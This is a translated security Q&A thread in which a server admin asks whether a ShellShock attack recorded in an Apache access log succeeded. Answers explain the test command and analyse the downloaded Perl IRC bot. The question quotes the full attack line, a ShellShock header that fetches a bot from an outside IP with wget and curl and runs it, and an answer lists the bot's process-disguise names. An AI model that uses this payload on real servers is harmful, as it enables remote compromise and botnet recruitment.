¿Funcionó este exploit de ShellShock?

Navega tus respuestas
2

Al revisar los registros de mi servidor web, noté dos ataques ShellShock diferentes en mi servidor, los cuales generaron un código de respuesta HTTP 200 OK. Se ven así (dirección IP / fecha y hora de redacción): 

223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""

Mi versión de bash es 4.2.37 y actualizamos este servidor regularmente a través de apt-get update && apt-get dist-upgrade junto con el análisis diario del archivo de registro. Apache 2.2.22 se está utilizando y solo el puerto 80 está abierto. El archivo descargado parece ser una secuencia de comandos de IRC que solo puedo imaginar que se utiliza con fines de inundación en este contexto.

Intentando ejecutar x='() { :;}; echo VULNERABLE' bash -c : (desde ¿Hay un comando corto para probar si mi servidor está seguro contra el error de bash shellshock? ) no devuelve nada pero ejecuta ps -p $$ desde un terminal SSH muestra un bash shell actualmente en uso.

La pregunta es: ¿es probable que la vulnerabilidad haya funcionado dado lo anterior?

    
pregunta Ocracoke 14.06.2015 - 02:54
fuente

2 respuestas

2

No hay forma de saberlo solo desde el archivo de registro. La respuesta "200 OK" simplemente significa que su servidor web se está ejecutando y tiene una página de índice en "/", algo que se aplica a casi todos los servidores web del mundo.

Si x='() { :;}; echo VULNERABLE' bash -c : no imprime la palabra VULNERABLE , es casi seguro que no eres vulnerable.

    
respondido por el Mark 14.06.2015 - 07:07
fuente
1

Este es un viejo bot de perl irc:

  

... ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;c...

En el momento en que escribo esto, ya hago el wget y algunas inspecciones: 

cd /tmp
wget 85.214.60.234/den
sed -e 's/^\(.\{78\}\).*//;12q' den
#!/usr/bin/perl

##############################################################################
##############################################################################
## JST Perl IrcBot v3.0 / 2011 by FrankBlack @ Millenium Group ## [ Help ] ###
##      Stealth MultiFunctional IrcBot writen in Perl          ###############
##        Teste on every system with PERL instlled             ##  !u @system 
##                                                             ##  !u @version
##     This is a free program used on your own risk.           ##  !u @channel
##        Created for educational purpose only.                ##  !u @flood  
## I'm not responsible for the illegal use of this program.    ##  !u @utils  
##############################################################################

Bueno, este antiguo script se oculta por sí mismo y muchas cosas bajo control remoto a través de un servidor IRC externo.

Ya escribí un no es perfecto DDos Perl IrcBot Killer , que funciona perfectamente con esta versión.

Eche un vistazo a las líneas 61 y 62 de mi script: 

61          m+^(/usr)?(/local)?(/s?bin)?[\[/]?(http|ssh|apache|syslog|cron|klog|kblockd|khelper|kmpathd|ksoftirqd|acpi|sync|-)+;
62  #       m+^(/usr)?(/local)?(/s?bin)?[\[/]?([a-z0-9-]\+)+;

y líneas 31 a 38 desde den versión: 

31  my @rps = ("/usr/local/apache/bin/httpd -DSSL",
32                     "/usr/sbin/httpd -k start -DSSL",
33             "/usr/sbin/httpd",
34             "/usr/sbin/apache2 -k start",
35                 "/sbin/syslogd",
36                 "/sbin/klogd -c 1 -x -x",
37                     "/usr/sbin/acpid",
38                     "/usr/sbin/cron");

Para que pueda asegurar ( hoy ), mi script encontrará y eliminará este virus .

    
respondido por el F. Hauri 14.06.2015 - 09:33
fuente

Lea otras preguntas en las etiquetas

Defensa contra técnicas de detección promiscuas sistema OTP Lamport